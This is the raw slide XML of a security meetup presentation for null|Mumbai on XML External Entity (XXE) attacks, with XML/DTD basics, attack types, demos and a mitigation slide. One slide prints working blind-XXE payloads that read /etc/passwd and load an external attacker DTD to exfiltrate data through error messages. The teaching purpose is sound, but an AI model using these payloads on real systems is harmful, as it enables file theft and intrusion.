              <a:t>file :-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&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "YOUR-DTD-URL"&gt; %xxe;]&gt;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3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2763769"/>
            <a:ext cx="10515599" cy="113237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DEMO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3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599" cy="11323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Description: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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496"/>
            <a:ext cx="10515600" cy="466725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An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.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Ranked on 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>th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of OWASP Top 10 (2017).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"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- OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r"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51653ADC-68C2-4914-AE71-3DFE80844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123" y="4387712"/>
            <a:ext cx="774080" cy="7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02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Exploiting blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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to retrieve data via error messages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68F65-2F0E-4E90-86AD-F01712306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Payloads used :-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&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:///invalid/%file;'&gt;"&gt;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%eval;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%exfil;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XML file:-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&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "YOUR-DTD-URL"&gt; %xxe;]&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3418762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2763769"/>
            <a:ext cx="10515599" cy="113237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DEMO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89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489CE0-C3D4-4C76-82E2-EC0981AD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Mitigation for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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E3778-1066-4685-92B1-FEF60AAE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Disable external entities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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70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489CE0-C3D4-4C76-82E2-EC0981AD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References: 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E3778-1066-4685-92B1-FEF60AAE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u="sng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https://www.w3schools.com/xml/xml_whatis.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/xxe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u="sng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https://www.synack.com/blog/a-deep-dive-into-xxe-injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=gjm6VHZa_8s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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27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489CE0-C3D4-4C76-82E2-EC0981AD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81" y="2466880"/>
            <a:ext cx="11505061" cy="173663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90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank you null|Mumbai for the opportunity </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="54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3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489CE0-C3D4-4C76-82E2-EC0981AD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69" y="2321106"/>
            <a:ext cx="11505061" cy="173663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90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s Dive into Basic’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="54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3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599" cy="11323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What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML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?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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496"/>
            <a:ext cx="10515600" cy="466725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XML stands for e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tensible </a:t>
            </a:r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arkup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L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anguage. It is a text-based markup language.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XML was released in late 90’s. it was created to provide an easy to use and store self describing data.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XML is designed to carry data, not to display data.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XML tags are not predefined. You must define your own tags.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XML is platform independent and language independent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r"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3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599" cy="11323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XML Example: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BE5D7F8-1B82-497E-B53B-567186411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7" y="1361215"/>
            <a:ext cx="10515600" cy="4935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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xml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 version = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.0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"?&gt;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n-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NullMeet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n-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Speaker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&gt;Ankit&lt;/</a:t>
            </a:r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FirstName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n-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LastName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&gt;Patel&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LastName&gt;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ContactNo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&gt;1234567890&lt;/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ContactNo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n-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email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&gt;ankitpatel@null_mumbai.com&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email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n-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>City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&gt;Mumbai&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>City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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Speaker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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NullMeet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7060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72F398-6F0C-4BA6-ADA2-865E6F1B8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5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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attributes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vs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Elements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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496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XML using attributes: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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person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gender=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>male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"&gt;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firstname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&gt;Ankit&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firstname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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lastname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&gt;Patel&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lastname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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person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XML using elements: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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person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gender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&gt;male&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gender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firstname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&gt;Ankit&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firstname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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lastname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&gt;Patel&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lastname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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person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0424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0676-A8A3-4FBA-9D47-920A3AE9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7" y="365125"/>
            <a:ext cx="10515599" cy="11323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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML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DTD</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496"/>
            <a:ext cx="10515600" cy="466725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Document Type Declaration, commonly known as DTD.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A DTD defines the structure and the legal elements and attributes of an XML document.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Why use DTD?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An application can use a DTD to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XML is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valid.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226712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1357</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>161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&lt;null&gt;alert(XXE)&lt;/null&gt;</vt:lpstr>
      <vt:lpstr>@nullmumbai: whoami</vt:lpstr>
      <vt:lpstr># Description:</vt:lpstr>
      <vt:lpstr>Let’s Dive into Basic’s</vt:lpstr>
      <vt:lpstr># What is XML?</vt:lpstr>
      <vt:lpstr># XML Example:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr># XML Attributes vs Elements</vt:lpstr>
      <vt:lpstr># XML DTD</vt:lpstr>
      <vt:lpstr># Types of DTD</vt:lpstr>
      <vt:lpstr># Internal DTD</vt:lpstr>
      <vt:lpstr># Internal DTD   </vt:lpstr>
      <vt:lpstr># External DTD   </vt:lpstr>
      <vt:lpstr># External DTD   </vt:lpstr>
      <vt:lpstr># XML DTD entities  </vt:lpstr>
      <vt:lpstr># XML DTD built-in entities  </vt:lpstr>
      <vt:lpstr># XML DTD entities  </vt:lpstr>
      <vt:lpstr># XML DTD entities  </vt:lpstr>
      <vt:lpstr>Basics over, Let’s jump to the main(XXE)  </vt:lpstr>
      <vt:lpstr># Types of XXE attacks   </vt:lpstr>
      <vt:lpstr>Exploiting XXE to retrieve files</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Exploiting XXE to perform SSRF attacks</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr># Parameter Entities</vt:lpstr>
      <vt:lpstr># Parameter Entities</vt:lpstr>
      <vt:lpstr>Exploiting blind XXE exfiltrate data out-of-band</vt:lpstr>
      <vt:lpstr>Exploiting blind XXE exfiltrate data out-of-band</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr> Exploiting blind XXE to retrieve data via error messages</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr># Mitigation for XXE </vt:lpstr>
      <vt:lpstr>References: </vt:lpstr>
      <vt:lpstr>Thank you null|Mumbai for the opportunity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&lt;null&gt;alert(Newsbytes)&lt;/null&gt;</dc:title>
  <dc:creator>Ankit Patel</dc:creator>
  <cp:lastModifiedBy>Ankit Patel</cp:lastModifiedBy>
  <cp:revision>151</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-09T04:53:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-14T03:09:26Z</dcterms:modified>
</cp:coreProperties>
</file>